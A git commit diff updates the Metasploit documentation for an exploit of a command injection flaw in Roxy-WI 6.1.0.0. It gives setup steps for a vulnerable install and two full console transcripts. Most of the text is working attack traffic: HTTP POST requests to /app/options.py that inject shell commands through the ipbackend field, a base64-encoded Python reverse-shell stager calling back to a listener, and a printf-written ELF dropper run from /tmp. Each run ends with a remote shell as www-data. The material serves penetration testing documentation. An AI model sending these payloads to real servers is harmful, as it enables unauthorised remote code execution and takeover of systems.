Add in updated scenario documentation
This commit is contained in:
parent
72b1dbfeee
commit
74496c1a29
|
@ -9,14 +9,15 @@ Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers.
|
|||
|
||||
Roxy-WI requires Python and a web server to run. Please visit following url to find out required python and other packages.
|
||||
|
||||
https://roxy-wi.org/installation.py#manual
|
||||
First grab a vulnerable copy of the code from the release pages at https://github.com/hap-wi/roxy-wi/releases.
|
||||
You will likely want to grab version 6.1.0.0 from https://github.com/hap-wi/roxy-wi/archive/refs/tags/v6.1.0.0.tar.gz
|
||||
|
||||
```
|
||||
git clone https://github.com/hap-wi/roxy-wi.git /var/www/haproxy-wi
|
||||
chmod +x haproxy-wi/app/*.py
|
||||
sudo ./haproxy-wi/app/create_db.py
|
||||
chown -R www-data:www-data haproxy-wi
|
||||
```
|
||||
Next follow the installation instructions at https://roxy-wi.org/installation.py#manual and be sure to replace `apache`
|
||||
with `www-data` where applicable if your using Debian or Ubuntu (they call this out in their instructions however
|
||||
it can be a bit hard to find which is why I'm noting it here).
|
||||
|
||||
Once you are done you should have a working copy of Roxy-Wi. Note that for some reason the login page didn't work for me
|
||||
in testing, however everything needed to test this module should be set up and operating as expected.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
|
@ -47,51 +48,345 @@ The base path to Roxy-WI. The default value is `/`.
|
|||
|
||||
## Scenarios
|
||||
|
||||
### Roxy-WI 6.1.1.0 Ubuntu 20.04 GNU/Linux (x86_64) - Apache/2.4.52 / Python 3.10.4 / MySQL 8.0.29 With Python Meterpreter Payload
|
||||
### Roxy-WI 6.1.0.0 Ubuntu 22.04 GNU/Linux (x86_64) - Apache/2.4.52 / Python 3.10.4 / MySQL 8.0.29 With Unix In-Memory Target
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/http/roxy_wi_exec
|
||||
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
|
||||
RHOST => 192.168.56.116
|
||||
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
|
||||
LHOST => 192.168.56.1
|
||||
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
|
||||
RPORT => 443
|
||||
msf6 exploit(linux/http/roxy_wi_exec) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.56.1:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
|
||||
[*] Executing Automatic for cmd/unix/python/meterpreter/reverse_tcp
|
||||
[*] Sending stage (40168 bytes) to 192.168.56.116
|
||||
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:56156) at 2022-07-25 18:49:54 +0300
|
||||
|
||||
meterpreter >
|
||||
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/linux/http/roxy_wi_exec
|
||||
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/http/roxy_wi_exec) > show options
|
||||
|
||||
Module options (exploit/linux/http/roxy_wi_exec):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:hos
|
||||
t:port][...]
|
||||
RHOSTS yes The target host(s), see https://github.com/rapid
|
||||
7/metasploit-framework/wiki/Using-Metasploit
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on
|
||||
. This must be an address on the local machine o
|
||||
r 0.0.0.0 to listen on all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
||||
SSLCert no Path to a custom SSL certificate (default is ran
|
||||
domly generated)
|
||||
TARGETURI / yes The URI of the vulnerable instance
|
||||
URIPATH no The URI to use for this exploit (default is rand
|
||||
om)
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/unix/python/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 172.22.230.145 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Unix (In-Memory)
|
||||
|
||||
|
||||
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 127.0.0.1
|
||||
RHOST => 127.0.0.1
|
||||
msf6 exploit(linux/http/roxy_wi_exec) > set HttpTrace true
|
||||
HttpTrace => true
|
||||
msf6 exploit(linux/http/roxy_wi_exec) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.22.230.145:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Checking if 127.0.0.1:443 is vulnerable!
|
||||
####################
|
||||
# Request:
|
||||
####################
|
||||
POST /app/options.py HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 93
|
||||
|
||||
serv=127.0.0.1&ipbackend=%22%3b%20id%20%3b%23&alert_consumer=iufmgha&backend_server=127.0.0.1
|
||||
####################
|
||||
# Response:
|
||||
####################
|
||||
HTTP/1.1 200 OK
|
||||
Date: Mon, 25 Jul 2022 18:46:55 GMT
|
||||
Server: Apache/2.4.52 (Ubuntu)
|
||||
Vary: Accept-Encoding
|
||||
Transfer-Encoding: chunked
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
<center><div class="alert alert-danger">Check the config file. Presence section configs and parameter haproxy_save_configs_dir</div>
|
||||
Content-type: text/html
|
||||
|
||||
<center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
|
||||
Content-type: text/html
|
||||
|
||||
<center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
|
||||
Content-type: text/html
|
||||
|
||||
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||
|
||||
[*] 127.0.0.1:443 is vulnerable!
|
||||
[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
|
||||
[*] Exploiting...
|
||||
####################
|
||||
# Request:
|
||||
####################
|
||||
POST /app/options.py HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 760
|
||||
|
||||
serv=127.0.0.1&ipbackend=%22%3b%20echo%20exec\%28__import__\%28\%27base64\%27\%29.b64decode\%28__import__\%28\%27codecs\%27\%29.getencoder\%28\%27utf-8\%27\%29\%28\%27aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE3Mi4yMi4yMzAuMTQ1Jyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc%2bSScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyh6bGliLmRlY29tcHJlc3MoYmFzZTY0LmI2NGRlY29kZShkKSkseydzJzpzfSkK\%27\%29\%5b0\%5d\%29\%29%20%7c%20exec%20%24%28which%20python%20%7c%7c%20which%20python3%20%7c%7c%20which%20python2%29%20-%20%3b%23&alert_consumer=gumovpt&backend_server=127.0.0.1
|
||||
[*] Sending stage (40164 bytes) to 172.22.230.145
|
||||
[*] Meterpreter session 1 opened (172.22.230.145:4444 -> 172.22.230.145:41506) at 2022-07-25 13:46:56 -0500
|
||||
####################
|
||||
# Response:
|
||||
####################
|
||||
No response received
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: www-data
|
||||
meterpreter > sysinfo
|
||||
Computer : gwillcox-Virtual-Machine
|
||||
OS : Linux 5.15.0-41-generic #44-Ubuntu SMP Wed Jun 22 14:20:53 UTC 2022
|
||||
Architecture : x64
|
||||
Meterpreter : python/linux
|
||||
meterpreter > pwd
|
||||
/var/www/haproxy-wi/app
|
||||
meterpreter > ls
|
||||
Listing: /var/www/haproxy-wi/app
|
||||
================================
|
||||
|
||||
Mode Size Type Last modified Name
|
||||
---- ---- ---- ------------- ----
|
||||
100664/rw-rw-r-- 83 fil 2022-06-30 02:43:57 -0500 .htaccess
|
||||
040755/rwxr-xr-x 4096 dir 2022-07-25 13:36:33 -0500 __pycache__
|
||||
100775/rwxrwxr-x 12822 fil 2022-06-30 02:43:57 -0500 add.py
|
||||
040775/rwxrwxr-x 4096 dir 2022-06-30 02:43:57 -0500 certs
|
||||
100775/rwxrwxr-x 4745 fil 2022-06-30 02:43:57 -0500 config.py
|
||||
100775/rwxrwxr-x 33194 fil 2022-06-30 02:43:57 -0500 create_db.py
|
||||
100775/rwxrwxr-x 14945 fil 2022-06-30 02:43:57 -0500 db_model.py
|
||||
100775/rwxrwxr-x 64688 fil 2022-06-30 02:43:57 -0500 funct.py
|
||||
100775/rwxrwxr-x 913 fil 2022-06-30 02:43:57 -0500 ha.py
|
||||
100775/rwxrwxr-x 8544 fil 2022-06-30 02:43:57 -0500 hapservers.py
|
||||
100775/rwxrwxr-x 3008 fil 2022-06-30 02:43:57 -0500 history.py
|
||||
100775/rwxrwxr-x 7145 fil 2022-06-30 02:43:57 -0500 login.py
|
||||
100775/rwxrwxr-x 1696 fil 2022-06-30 02:43:57 -0500 logs.py
|
||||
100775/rwxrwxr-x 1598 fil 2022-06-30 02:43:57 -0500 metrics.py
|
||||
100775/rwxrwxr-x 966 fil 2022-06-30 02:43:57 -0500 nettools.py
|
||||
100775/rwxrwxr-x 181104 fil 2022-06-30 02:43:57 -0500 options.py
|
||||
100775/rwxrwxr-x 4096 fil 2022-06-30 02:43:57 -0500 overview.py
|
||||
100775/rwxrwxr-x 1884 fil 2022-06-30 02:43:57 -0500 portscanner.py
|
||||
100775/rwxrwxr-x 1125 fil 2022-06-30 02:43:57 -0500 provisioning.py
|
||||
100644/rw-r--r-- 274432 fil 2022-07-25 13:41:13 -0500 roxy-wi.db
|
||||
100775/rwxrwxr-x 750 fil 2022-06-30 02:43:57 -0500 runtimeapi.py
|
||||
040775/rwxrwxr-x 4096 dir 2022-06-30 02:43:57 -0500 scripts
|
||||
100775/rwxrwxr-x 2486 fil 2022-06-30 02:43:57 -0500 sections.py
|
||||
100775/rwxrwxr-x 1580 fil 2022-06-30 02:43:57 -0500 servers.py
|
||||
100775/rwxrwxr-x 1826 fil 2022-06-30 02:43:57 -0500 smon.py
|
||||
100775/rwxrwxr-x 103924 fil 2022-06-30 02:43:57 -0500 sql.py
|
||||
040775/rwxrwxr-x 4096 dir 2022-06-30 02:43:57 -0500 templates
|
||||
100775/rwxrwxr-x 1361 fil 2022-06-30 02:43:57 -0500 users.py
|
||||
100775/rwxrwxr-x 4150 fil 2022-06-30 02:43:57 -0500 versions.py
|
||||
100775/rwxrwxr-x 2076 fil 2022-06-30 02:43:57 -0500 viewlogs.py
|
||||
100775/rwxrwxr-x 1150 fil 2022-06-30 02:43:57 -0500 viewsttats.py
|
||||
100775/rwxrwxr-x 1819 fil 2022-06-30 02:43:57 -0500 waf.py
|
||||
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
### Roxy-WI 6.1.1.0 Ubuntu 20.04 GNU/Linux (x86_64) - Apache/2.4.52 / Python 3.10.4 / MySQL 8.0.29 With Linux CMD Payload
|
||||
### Roxy-WI 6.1.0.0 Ubuntu 22.04 GNU/Linux (x86_64) - Apache/2.4.52 / Python 3.10.4 / MySQL 8.0.29 With Linux Dropper Target
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/http/roxy_wi_exec
|
||||
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
|
||||
RHOST => 192.168.56.116
|
||||
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
|
||||
RPORT => 443
|
||||
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
|
||||
LHOST => 192.168.56.1
|
||||
msf6 exploit(linux/http/roxy_wi_exec) > set payload cmd/unix/reverse_bash
|
||||
payload => cmd/unix/reverse_bash
|
||||
msf6 exploit(linux/http/roxy_wi_exec) > run
|
||||
[*] Started reverse TCP handler on 192.168.56.1:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Checking if 192.168.56.116:443 is vulnerable!
|
||||
[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
|
||||
[*] Generating payload.
|
||||
[*] Trying to detect command injection vulnerability.
|
||||
[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.116:37396) at 2022-07-21 13:50:23 +0300
|
||||
[+] Exploit successfully executed.
|
||||
id
|
||||
uid=33(www-data) gid=33(www-data) groups=33(www-data)```
|
||||
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/linux/http/roxy_wi_exec
|
||||
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/http/roxy_wi_exec) > show options
|
||||
|
||||
Module options (exploit/linux/http/roxy_wi_exec):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:hos
|
||||
t:port][...]
|
||||
RHOSTS yes The target host(s), see https://github.com/rapid
|
||||
7/metasploit-framework/wiki/Using-Metasploit
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on
|
||||
. This must be an address on the local machine o
|
||||
r 0.0.0.0 to listen on all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
||||
SSLCert no Path to a custom SSL certificate (default is ran
|
||||
domly generated)
|
||||
TARGETURI / yes The URI of the vulnerable instance
|
||||
URIPATH no The URI to use for this exploit (default is rand
|
||||
om)
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/unix/python/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 172.22.230.145 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Unix (In-Memory)
|
||||
|
||||
|
||||
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 127.0.0.1
|
||||
RHOST => 127.0.0.1
|
||||
msf6 exploit(linux/http/roxy_wi_exec) > set HttpTrace true
|
||||
HttpTrace => true
|
||||
msf6 exploit(linux/http/roxy_wi_exec) > set Target 1
|
||||
Target => 1
|
||||
msf6 exploit(linux/http/roxy_wi_exec) > set payload linux/x64/shell/reverse_tcp
|
||||
payload => linux/x64/shell/reverse_tcp
|
||||
msf6 exploit(linux/http/roxy_wi_exec) > show options
|
||||
|
||||
Module options (exploit/linux/http/roxy_wi_exec):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:hos
|
||||
t:port][...]
|
||||
RHOSTS 127.0.0.1 yes The target host(s), see https://github.com/rapid
|
||||
7/metasploit-framework/wiki/Using-Metasploit
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on
|
||||
. This must be an address on the local machine o
|
||||
r 0.0.0.0 to listen on all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
||||
SSLCert no Path to a custom SSL certificate (default is ran
|
||||
domly generated)
|
||||
TARGETURI / yes The URI of the vulnerable instance
|
||||
URIPATH no The URI to use for this exploit (default is rand
|
||||
om)
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (linux/x64/shell/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 172.22.230.145 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
1 Linux (Dropper)
|
||||
|
||||
|
||||
msf6 exploit(linux/http/roxy_wi_exec) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.22.230.145:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Checking if 127.0.0.1:443 is vulnerable!
|
||||
####################
|
||||
# Request:
|
||||
####################
|
||||
POST /app/options.py HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 93
|
||||
|
||||
serv=127.0.0.1&ipbackend=%22%3b%20id%20%3b%23&alert_consumer=oodqhqe&backend_server=127.0.0.1
|
||||
####################
|
||||
# Response:
|
||||
####################
|
||||
HTTP/1.1 200 OK
|
||||
Date: Mon, 25 Jul 2022 19:07:53 GMT
|
||||
Server: Apache/2.4.52 (Ubuntu)
|
||||
Vary: Accept-Encoding
|
||||
Transfer-Encoding: chunked
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
<center><div class="alert alert-danger">Check the config file. Presence section configs and parameter haproxy_save_configs_dir</div>
|
||||
Content-type: text/html
|
||||
|
||||
<center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
|
||||
Content-type: text/html
|
||||
|
||||
<center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
|
||||
Content-type: text/html
|
||||
|
||||
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||
|
||||
[*] 127.0.0.1:443 is vulnerable!
|
||||
[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
|
||||
[*] Exploiting...
|
||||
####################
|
||||
# Request:
|
||||
####################
|
||||
POST /app/options.py HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 939
|
||||
|
||||
serv=127.0.0.1&ipbackend=%22%3b%20printf%20%27\177\105\114\106\2\1\1\0\0\0\0\0\0\0\0\0\2\0\76\0\1\0\0\0\170\0\100\0\0\0\0\0\100\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\100\0\70\0\1\0\0\0\0\0\0\0\1\0\0\0\7\0\0\0\0\0\0\0\0\0\0\0\0\0\100\0\0\0\0\0\0\0\100\0\0\0\0\0\372\0\0\0\0\0\0\0\174\1\0\0\0\0\0\0\0\20\0\0\0\0\0\0\110\61\377\152\11\130\231\266\20\110\211\326\115\61\311\152\42\101\132\262\7\17\5\110\205\300\170\121\152\12\101\131\120\152\51\130\231\152\2\137\152\1\136\17\5\110\205\300\170\73\110\227\110\271\2\0\21\134\254\26\346\221\121\110\211\346\152\20\132\152\52\130\17\5\131\110\205\300\171\45\111\377\311\164\30\127\152\43\130\152\0\152\5\110\211\347\110\61\366\17\5\131\131\137\110\205\300\171\307\152\74\130\152\1\137\17\5\136\152\46\132\17\5\110\205\300\170\355\377\346%27%3e%3e/tmp/olXCy%20%3b%20chmod%20%2bx%20/tmp/olXCy%20%3b%20/tmp/olXCy%20%3b%20rm%20-f%20/tmp/olXCy%20%3b%23&alert_consumer=kvlkaqe&backend_server=127.0.0.1
|
||||
[*] Sending stage (38 bytes) to 172.22.230.145
|
||||
[*] Command shell session 2 opened (172.22.230.145:4444 -> 172.22.230.145:41508) at 2022-07-25 14:07:59 -0500
|
||||
i####################
|
||||
# Response:
|
||||
####################
|
||||
No response received
|
||||
d[*] Command Stager progress - 100.00% done (810/810 bytes)
|
||||
|
||||
id
|
||||
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||
whoami
|
||||
www-data
|
||||
pwd
|
||||
/var/www/haproxy-wi/app
|
||||
ls
|
||||
__pycache__
|
||||
add.py
|
||||
certs
|
||||
config.py
|
||||
create_db.py
|
||||
db_model.py
|
||||
funct.py
|
||||
ha.py
|
||||
hapservers.py
|
||||
history.py
|
||||
login.py
|
||||
logs.py
|
||||
metrics.py
|
||||
nettools.py
|
||||
options.py
|
||||
overview.py
|
||||
portscanner.py
|
||||
provisioning.py
|
||||
roxy-wi.db
|
||||
runtimeapi.py
|
||||
scripts
|
||||
sections.py
|
||||
servers.py
|
||||
smon.py
|
||||
sql.py
|
||||
templates
|
||||
users.py
|
||||
versions.py
|
||||
viewlogs.py
|
||||
viewsttats.py
|
||||
waf.py
|
||||
```
|
||||
|
|
Loading…
Reference in New Issue